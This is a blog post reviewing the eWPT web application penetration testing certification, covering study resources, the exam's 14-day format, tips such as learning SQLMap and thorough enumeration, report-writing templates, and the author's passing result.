So the goal I had for 2022 was to focus more on certifications that are more hands-on and can challenge my skillset. Why? Theoretical certifications do have their use but the more hands-on the cert, then the more relevant it is to my Security Engineer Role. It offers more value from a learning standpoint and let’s face it, it can even give additional attack vectors when testing applications. So with that said, let’s dive right in!
I was tempted to jump right into the exam as I was a bit overconfident. I resisted the urge and decided to do some preparation instead. Let me just say, I am happy I did. If you’re fortunate and have access to the INE courses, that is literally all you need to pass. The material is somewhat outdated as it touches on Flash Security but essentially it does have all you need. The labs are an added bonus to flex your skills as there are tasks that no solutions are given, so your creative thinking is a big factor. If you are not as fortunate in having access to INE then there are a lot of free resources that can assist. I took a look at this GitHub Repository that compiled useful resources for passing the exam. Practicing on Hack the Box also offers some level of comfort for the exam. Whatever method you go through, take notes! I cannot stress this enough as rather than going through a lesson in its entirety, simple flashcards save you so much time.
When you start your exam you are given a letter of engagement which also has your objective. Please note the objective is a necessary condition to pass but it alone is not sufficient. You get 14 days, this is split evenly down the middle with 7 days for testing and an additional 7 for reporting. In most cases, I think anyone will be finished before the 14 day period. Do not treat this exam as a CTF. It isn’t! It is more focused on writing a comprehensive penetration test report on all if not most of the vulnerabilities in the environment. You need to put in a considerable amount of effort to pass the eWPT, you can safely focus your efforts on the course materials that come from INE or the resources mentioned earlier and go at your own pace while doing the exam. There were times when the exam environment was unstable and I had to refresh it at different moments but outside of that it was a pretty good experience. If for any reason you think you may be on the verge of failing, fret not, you get a free exam retake. This gives you an additional seven days to read what your exam reviewer noted and how to correct where you went wrong.
- There are several paths to achieving the objective of the exam.
- Report every finding you come upon. Do not assume a finding is insignificant.
- Eat, breathe, and sleep SQL Map. It is great in the automation of finding SQLi and XSS-based vulnerabilities. Particularly you should understand how this command works:
3. Enumeration is key.
4. Understand the application inner architecture while testing and pay attention to file paths.
5. Outline clearly in your report how you achieved the objective.
This is always something we as security professionals tend to run from, the documentation side of things is always a turn off. Unfortunately, this is one of the primary ways we get paid, so it is necessary. The TCM Reporting Template is one of the best templates you could use to fill in your findings as well as a LaTeX Template. Reporting is tedious but with the help of the above-mentioned templates or anyone you may have found in the wild, the reporting process becomes a breeze.
Overthinking began to kick in when I thought I was done. Submit or test some more? Ultimately I decided to submit. The report had 22 issues and it was 62 pages long without the fluff. It took me a day and a half to complete testing and reporting but the waiting that followed is absolutely nerve-racking. Took me almost 3 weeks to get that e-mail that I successfully passed. eLearnSecurity does advise you that it takes about 30 days or less to review your report, this is in keeping with having a security professional review your report to see if it meets their standards. The exam was a good experience and I would recommend it to any upcoming or even a seasoned Web Application Penetration Tester looking to flex their skills. The exam is not proctored and based on research it isn’t an exam that is randomized(the exam content isn’t static). So having someone take the exam for you is very much possible. I don’t condone any of this, but it does give fuel to the ongoing debate on proctored vs unproctored cyber security exams, I may do a deep dive on this in another blog post. With that said, I encourage anyone interested in the Cyber Security space to attempt this certification.